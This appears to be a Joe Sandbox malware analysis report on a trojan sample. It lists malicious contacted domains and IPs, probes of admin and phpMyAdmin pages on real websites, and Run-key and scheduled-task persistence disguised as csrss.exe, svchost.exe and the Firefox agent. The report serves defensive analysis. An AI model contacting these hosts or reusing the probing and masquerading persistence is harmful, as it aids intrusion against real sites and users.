jaydien.com	141.193.213.10	true	true	unknown
d298861a.ess.barracudanetworks.com	209.222.82.255	true	false	high
accounts.google.com	172.217.3.77	true	false	high
sites.google.com	192.178.50.46	true	false	high
davescheirer-com.mail.protection.outlook.com	104.47.75.164	true	false	high
mail.oljud.net	192.252.151.25	true	false	unknown
mail.eddc.com	208.91.197.26	true	true	unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	false	unknown
derrickandbriggs.com	23.229.226.96	true	true	unknown
tablesockartfinewa.pw	104.21.85.41	true	true	unknown
aikya.org	104.21.69.169	true	true	unknown
www.51goabroad.com	38.177.197.58	true	true	unknown
pmcsystem.com	185.230.63.107	true	true	unknown
derrickandbriggs-com.mail.protection.outlook.com	52.101.9.0	true	false	high
mail4.stememail.net	165.22.195.184	true	true	unknown
mail.intermountainmls.com	66.232.64.219	true	false	unknown
mx1-us1.ppe-hosted.com	148.163.129.50	true	false	unknown
mx.enricobassi.com	62.149.128.163	true	true	unknown
bldowney.com.2.0001.arsmtp.com	8.19.118.200	true	false	unknown
saltdelcolom.com	50.31.65.5	true	true	unknown
d298861b.ess.barracudanetworks.com	209.222.82.253	true	false	high
tvs-e.com	13.126.65.12	true	true	unknown
mail.omuramba.com	156.38.230.76	true	true	unknown
mx2-us1.ppe-hosted.com	148.163.129.51	true	false	unknown
customizedperformance.com	13.248.169.48	true	true	unknown
mx003.netsol.xion.oxcs.net	51.81.206.108	true	true	unknown
mailbox.lpl.org	96.249.39.20	true	true	unknown
caribbean360.com	67.222.150.127	true	false	high
www.enricobassi.com	62.149.128.40	true	false	unknown
oceanictrailers.com.au	185.162.89.66	true	true	unknown
www.conquestaccounting.com.au	35.197.165.27	true	false	unknown
51goabroad.com	38.177.197.58	true	true	unknown
mail.customizedperformance.com	13.248.169.48	true	true	unknown
ismaworld-com.mail.protection.outlook.com	104.47.74.202	true	false	high
loghole.com	3.33.130.190	true	true	unknown
yandfcorp.com	3.33.130.190	true	true	unknown
ftp.theproducebox.com	104.26.1.173	true	true	unknown
indfos.com	3.126.94.219	true	true	unknown
aldine.org.com	34.206.39.153	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://indfos.com/PhpMyAdmin	true	Avira URL Cloud: safe	unknown
http://oljud.net/phpmyadmin/	false	Avira URL Cloud: safe	unknown
https://jaydien.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://cicfl.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
https://oljud.net/phpmyadmin/	false	Avira URL Cloud: safe	unknown
https://www.valentinegrowers.com/pma	false	Avira URL Cloud: safe	unknown
https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1	true	Avira URL Cloud: safe	unknown
http://harrell-associates.com/admin.php	true	Avira URL Cloud: safe	unknown
https://yandfcorp.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
https://ismaworld.com/phpmyadmin	false	Avira URL Cloud: safe	unknown
https://www.thenile.com.au/phpMyAdmin	true	Avira URL Cloud: safe	unknown
https://www.thenile.com.au/wp-admin/	true	Avira URL Cloud: safe	unknown
http://coupons2grab.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://tonimiuyaytre.org/	true	URL Reputation: safe	unknown
https://yandfcorp.com/administrator/	true	Avira URL Cloud: safe	unknown
http://videolifeperu.com/admin.php	true	Avira URL Cloud: safe	unknown
http://saltdelcolom.com/PhpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://pcfocus.com.hk/admin.php	true	Avira URL Cloud: safe	unknown
http://adm-works.com/admin.php	true	Avira URL Cloud: safe	unknown
https://customizedperformance.com/admin	true	Avira URL Cloud: safe	unknown
http://harrell-associates.com/admin	true	Avira URL Cloud: safe	unknown
https://theproducebox.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://customizedperformance.com/wp-login.php	true	Avira URL Cloud: safe	unknown
https://covicol.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://loghole.com/pma/	true	Avira URL Cloud: safe	unknown
http://oceanictrailers.com.au/pma/	true	Avira URL Cloud: safe	unknown
http://indfos.com/PhpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://covicol.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
https://thenile.com.au/pma/	true	Avira URL Cloud: safe	unknown
http://harrell-associates.com/PhpMyAdmin/	true	Avira URL Cloud: safe	unknown
https://bldowney.com/pma/	true	Avira URL Cloud: safe	unknown
http://keywordranker.com/admin	true	Avira URL Cloud: safe	unknown
http://tgeddesgrant.com/phpMyAdmin/	false	Avira URL Cloud: safe	unknown
https://intermountainmls.com/administrator/	true	Avira URL Cloud: safe	unknown
https://cannaclear.com/wp-login.php?redirect_to=https%3A%2F%2Fcannaclear.com%2Fwp-admin%2F&reauth=1	true	Avira URL Cloud: safe	unknown
https://sites.google.com/site/mcammondlife/	false		high
https://intermountainmls.com/wp-admin/	true	Avira URL Cloud: safe	unknown
http://harrell-associates.com/pma/	true	Avira URL Cloud: safe	unknown
http://davescheirer.com/admin/	true	Avira URL Cloud: safe	unknown
http://ismaworld.com/phpMyAdmin	false	Avira URL Cloud: safe	unknown
http://theproducebox.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://conquestaccounting.com.au/phpMyAdmin/	false	Avira URL Cloud: safe	unknown
http://kegerators.net/pma/	true	Avira URL Cloud: safe	unknown
http://www.51goabroad.com/admin.php	true	Avira URL Cloud: safe	unknown
https://www.covicol.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://yandfcorp.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://harrell-associates.com/phpmyadmin/	true		unknown
http://ismaworld.com/wp-login.php	false	Avira URL Cloud: safe	unknown
http://jiashi.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://videolifeperu.com/PhpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://valentinegrowers.com/admin/	true	Avira URL Cloud: safe	unknown
http://vixej.com/admin	true	Avira URL Cloud: safe	unknown
https://www.valentinegrowers.com/wp-login.php	false	Avira URL Cloud: safe	unknown
http://jiashi.com/admin	true	Avira URL Cloud: safe	unknown
http://jiashi.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://liberty25.org/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://intermountainmls.com/admin.php	true	Avira URL Cloud: safe	unknown
https://www.hugedomains.com/domain_profile.cfm?d=keywordranker.com	false		high
http://videolifeperu.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://ispsolucoes.com/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://adm-works.com/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://ireland-ventures.com/admin	true	Avira URL Cloud: safe	unknown
http://oljud.net/administrator/index.php	false	Avira URL Cloud: safe	unknown
http://www.enricobassi.com/phpMyAdmin/	false	Avira URL Cloud: safe	unknown
http://smartiebritches.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://www.enricobassi.com/admin	false	Avira URL Cloud: safe	unknown
http://aikya.org/pma/	true	Avira URL Cloud: safe	unknown
http://dl-it.net/phpmyadmin/	false	Avira URL Cloud: malware	unknown
http://cannaclear.com/admin.php	true	Avira URL Cloud: safe	unknown
http://sunbeltfinancial.com/admin	true	Avira URL Cloud: safe	unknown
http://liberty25.org/wp-admin/	true	Avira URL Cloud: safe	unknown
http://eddc.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://sunbeltfinancial.com/admin.php	true	Avira URL Cloud: safe	unknown
http://oljud.net/PhpMyAdmin/	false		unknown
https://www.adelaideclub.com/phpMyAdmin/	true	Avira URL Cloud: safe	unknown
http://davescheirer.com/phpmyadmin/	true	Avira URL Cloud: safe	unknown
http://thenile.com.au/administrator/	true	Avira URL Cloud: safe	unknown
http://easlab.com/admin/	false	Avira URL Cloud: safe	unknown
http://intermountainmls.com/wp-login.php	true	Avira URL Cloud: safe	unknown
https://cicfl.com/admin.php	true	Avira URL Cloud: safe	unknown
http://www.coupons2grab.com/administrator/index.php	true	Avira URL Cloud: safe	unknown
http://jaydien.com/wp-login.php	true	Avira URL Cloud: safe	unknown
http://theproducebox.com/wp-login.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cannaclear.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.18.0	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-smart-refunder/assets/f	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/product-category/delta-8/delta-8-distillate/	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/product/bulk-cbg-isolate/	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/wp-content/cache/min/1/wp-content/themes/flatsome/assets/css/flatsome-shop.cs	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1684862545.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	D217.exe, 00000008.00000003.2014962700.00000000019DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cannaclear.com/product/cbg-tincture/	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/product-category/concentrates/	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cannaclear.com/product/thcv-isolate/	CA65.exe, 00000007.00000003.3480124992.0000000071B55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://diagramfiremonkeyowwa.fun/ff-j0	D217.exe, 00000008.00000003.2015110979.00000000019AF000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000002.2062384038.00000000019AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dumperstats.org	4E3.exe, 0000001D.00000002.4257859300.000000000C08C000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1680983414.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
171.25.193.9	unknown	Sweden	198093	DFRI-ASForeningenfordigitalafri-ochrattigheterSE	false
202.130.44.227	mx01.mailcluster.com.au	Australia	55803	DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU	true
23.229.226.96	derrickandbriggs.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
85.234.244.76	zonemx.eu	Estonia	21315	ENGIE-SERVICES-SDONL	true
68.178.213.244	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
198.50.191.95	unknown	Canada	16276	OVHFR	false
136.147.129.27	oe.target.com	United States	22606	EXACT-7US	false
192.124.249.58	tgeddesgrant.com	United States	30148	SUCURI-SECUS	false
172.98.192.36	dl-it.net	United States	31863	DACEN-2US	false
3.126.94.219	indfos.com	United States	16509	AMAZON-02US	true
104.47.71.138	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
34.94.245.237	sumagulituyo.org	United States	15169	GOOGLEUS	false
77.174.164.37	unknown	Netherlands	12871	NL-CONCEPTSNL	false
35.168.67.138	mcammond.net	United States	14618	AMAZON-AESUS	true
104.24.83.4	unknown	United States	13335	CLOUDFLARENETUS	true
85.234.244.77	unknown	Estonia	21315	ENGIE-SERVICES-SDONL	true
209.182.195.165	shapeab.com	United States	22611	IMH-WESTUS	true
218.213.216.3	www.pcfocus.com.hk	Hong Kong	9293	HKNET-VIPNETNTTComAsiaLimitedHK	true
209.222.82.255	d298861a.ess.barracudanetworks.com	United States	16509	AMAZON-02US	false
172.217.204.27	aspmx.l.google.com	United States	15169	GOOGLEUS	false
212.159.8.200	mx.avasin.plus.net	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	false
15.204.141.95	unknown	United States	71	HP-INTERNET-ASUS	false
31.214.176.67	mx01.dondominio.com	Spain	57910	SCIP-ASSolucionesCorporativasIPSCIPES	true
209.222.82.253	d298861b.ess.barracudanetworks.com	United States	16509	AMAZON-02US	false
209.222.82.252	unknown	United States	16509	AMAZON-02US	true
172.67.196.235	unknown	United States	13335	CLOUDFLARENETUS	false
213.144.142.24	unknown	Switzerland	13030	INIT7CH	false
13.126.65.12	tvs-e.com	United States	16509	AMAZON-02US	true
91.215.85.17	stualialuyastrelia.net	Russian Federation	34665	PINDC-ASRU	true
62.149.128.40	www.enricobassi.com	Italy	31034	ARUBA-ASNIT	false
167.235.0.29	luthien.arcadina.net	United States	3525	ALBERTSONSUS	true
34.205.242.146	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
13.248.169.48	customizedperformance.com	United States	16509	AMAZON-02US	true
216.69.141.82	mailstore1.secureserver.net	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
68.178.252.117	pop.us-phx.vox.secureserver.net	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
104.47.18.74	covicol-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.18.224	diagramfiremonkeyowwa.fun	United States	13335	CLOUDFLARENETUS	false
104.26.6.37	www.hugedomains.com	United States	13335	CLOUDFLARENETUS	false
192.42.113.102	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
183.111.174.109	dpikorea.org	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
209.124.80.122	cicfl.com	United States	55293	A2HOSTINGUS	true
217.146.69.50	pistik.com	Estonia	49604	ZONEZoneMediaOUEE	true
200.58.112.162	massnegocios.com	Argentina	27823	DattateccomAR	true
104.21.87.137	neighborhoodfeelsa.fun	United States	13335	CLOUDFLARENETUS	false
46.30.211.110	pop.one.com	Denmark	51468	ONECOMDK	false
34.206.39.153	aldine.org.com	United States	14618	AMAZON-AESUS	false
66.254.66.55	ireland-ventures.com	United States	7024	PIXELGATEUS	true
205.178.189.129	coupons2grab.com	United States	55002	DEFENSE-NETUS	true
104.47.75.164	davescheirer-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.47.55.138	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
142.44.227.24	unknown	Canada	16276	OVHFR	false
115.111.182.213	viruswall.tvs-e.in	India	4755	TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISP	true
85.146.92.119	unknown	Netherlands	50266	TMOBILE-THUISNL	false
104.47.59.138	bethanyhomesnc-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
15.197.142.173	kegerators.net	United States	7430	TANDEMUS	true
104.47.74.202	ismaworld-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
208.91.197.26	eddc.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
64.68.191.221	adelaideclub.com	United States	14955	N-V-CUS	true
104.24.82.4	www.thenile.com.au	United States	13335	CLOUDFLARENETUS	true
185.230.63.171	valentinegrowers.com	Israel	58182	WIX_COMIL	true
136.147.189.244	inbound-reply.s7.exacttarget.com	United States	22606	EXACT-7US	false
172.67.185.93	linkofstrumble.com	United States	13335	CLOUDFLARENETUS	true
172.67.210.143	unknown	United States	13335	CLOUDFLARENETUS	false
89.191.217.1	unknown	United Kingdom	1239	SPRINTLINKUS	false
91.121.86.59	unknown	France	16276	OVHFR	false
148.163.129.50	mx1-us1.ppe-hosted.com	United States	13916	PROOFPOINT-UT7US	false
185.220.101.209	unknown	Germany	208294	ASMKNL	false
104.21.46.59	cream.hitsturbo.com	United States	13335	CLOUDFLARENETUS	true
104.26.0.173	theproducebox.com	United States	13335	CLOUDFLARENETUS	true
192.178.50.46	sites.google.com	United States	15169	GOOGLEUS	false
104.47.66.10	lpl-org.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
76.223.54.146	unknown	United States	16509	AMAZON-02US	true
3.94.41.167	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	true
142.250.27.26	alt4.aspmx.l.google.com	United States	15169	GOOGLEUS	false
206.188.192.247	sunbeltfinancial.com	United States	55002	DEFENSE-NETUS	true
104.47.75.228	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
96.249.39.20	mailbox.lpl.org	United States	701	UUNETUS	true
3.33.130.190	loghole.com	United States	8987	AMAZONEXPANSIONGB	true
82.66.249.246	unknown	France	12322	PROXADFR	false
104.198.2.251	snukerukeutit.org	United States	15169	GOOGLEUS	false
192.185.183.254	easlab.com	United States	46606	UNIFIEDLAYER-AS-1US	false
3.230.199.117	static.turbifysites.com	United States	14618	AMAZON-AESUS	true
104.143.9.210	unknown	United States	64200	VIVIDHOSTINGUS	false
185.230.63.107	pmcsystem.com	Israel	58182	WIX_COMIL	true
18.208.22.79	cgoc.in.tmes.trendmicro.com	United States	14618	AMAZON-AESUS	false
62.149.128.151	unknown	Italy	31034	ARUBA-ASNIT	true
104.143.9.211	buyhits.net	United States	64200	VIVIDHOSTINGUS	true
103.42.111.169	geis.com.au	Australia	45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	true
18.208.22.77	unknown	United States	14618	AMAZON-AESUS	false
37.200.99.251	unknown	Germany	34011	GD-EMEA-DC-CGN1DE	false
196.188.169.138	ftpvoyager.cc	Ethiopia	24757	EthioNet-ASET	true
216.194.166.146	mail.adm-works.com	United States	22611	IMH-WESTUS	true
207.211.30.141	unknown	United States	30031	MIMECAST-US	true
50.31.65.5	saltdelcolom.com	United States	32748	STEADFASTUS	true
172.67.215.49	shpilliwilli.com	United States	13335	CLOUDFLARENETUS	true
34.143.166.163	lightseinsteniki.org	United States	2686	ATGS-MMD-ASUS	true
34.136.28.237	ispsolucoes.com	United States	2686	ATGS-MMD-ASUS	true
64.233.184.26	alt3.aspmx.l.google.com	United States	15169	GOOGLEUS	false
38.177.197.58	www.51goabroad.com	United States	174	COGENT-174US	true
52.101.9.0	derrickandbriggs-com.mail.protection.outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1366391
Start date and time:	2023-12-22 21:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xqz8sQ4mZB.exe renamed because original name is a hash value
Original Sample Name:	c03fd7d0315eacae0cf170692fcf1f2f.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@106/79@2042/100
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.189.173.20, 104.22.28.101, 104.22.29.101, 172.67.4.79, 13.89.179.12
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, buiiacu.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, www.wika.com.cdn.cloudflare.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
Execution Graph export aborted for target D217.exe, PID 6844 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: xqz8sQ4mZB.exe

Simulations

Behavior and APIs

Time	Type	Description
20:12:14	Task Scheduler	Run new task: Firefox Default Browser Agent 5984E32138921852 path: C:\Users\user\AppData\Roaming\ibjhisi
20:12:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
20:12:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
20:13:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HostFile C:\Users\user\AppData\Local\Temp\svchost.exe
20:13:03	Task Scheduler	Run new task: Firefox Default Browser Agent E9949720899AF649 path: C:\Users\user\AppData\Roaming\adjhisi
20:13:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce HostFile C:\Users\user\AppData\Local\Temp\svchost.exe
21:12:00	API Interceptor	291953x Sleep call for process: explorer.exe modified
21:12:27	API Interceptor	1x Sleep call for process: D217.exe modified
21:12:30	API Interceptor	1x Sleep call for process: DFD5.exe modified
21:12:32	API Interceptor	3x Sleep call for process: RegSvcs.exe modified
21:12:33	API Interceptor	4x Sleep call for process: WerFault.exe modified
21:12:41	API Interceptor	7x Sleep call for process: 4E3.exe modified
21:12:46	API Interceptor	20x Sleep call for process: powershell.exe modified
21:13:04	API Interceptor	3907x Sleep call for process: CA65.exe modified
21:13:18	API Interceptor	10999x Sleep call for process: csrss.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
171.25.193.9	R53a3ZJHBQ.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	x3WX1kHqcx.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	oGO7Hy4YCH.exe	Get hash	malicious	SystemBC	Browse	171.25.193.9/tor/status-vote/current/consensus
	SPXp2YHDFz.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	ILI1MGzcig.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	lwRhzjuYIg.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	OVrJ9mtD6Y.exe	Get hash	malicious	TinyNuke	Browse	171.25.193.9/tor/status-vote/current/consensus
	F75rJPKdGb.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	ozJy5Zf5cf.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	zfpLjnr5P9.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	kecFPnbu5K.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	SecuriteInfo.com.Trojan.Kronos.21.31435.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	530000.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	6d0000.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	6729001591617.exe	Get hash	malicious	Kronos	Browse	171.25.193.9/tor/status-vote/current/consensus
	NNrUb9Avaw.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	taugif.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	9WajXSHVwg.exe	Get hash	malicious	Unknown	Browse	171.25.193.9/tor/status-vote/current/consensus
	bill4759.doc	Get hash	malicious		Browse	171.25.193.9/tor/status-vote/current/consensus
	bill notice 05.2019.xls	Get hash	malicious		Browse	171.25.193.9/tor/status-vote/current/consensus

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mx.jk.locaweb.com.br	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	200.234.204.130
lightseinsteniki.org	HVqTxn73uD.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	3yPvcmrbqS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	34.143.166.163
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	107.178.223.183
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	34.143.166.163
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	K6DjJpNlzI.exe	Get hash	malicious	LummaC Stealer, RedLine, SmokeLoader	Browse	34.143.166.163
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
clients.finalsitecdn.com	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	104.17.163.123
	http://blackboardconnect.com	Get hash	malicious	Unknown	Browse	104.17.162.123
	http://www.finalsiteconnect.com/login	Get hash	malicious	Unknown	Browse	104.17.164.123
	http://www.finalsiteconnect.com	Get hash	malicious	Unknown	Browse	104.17.165.123
cream.hitsturbo.com	HVqTxn73uD.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	172.67.168.30
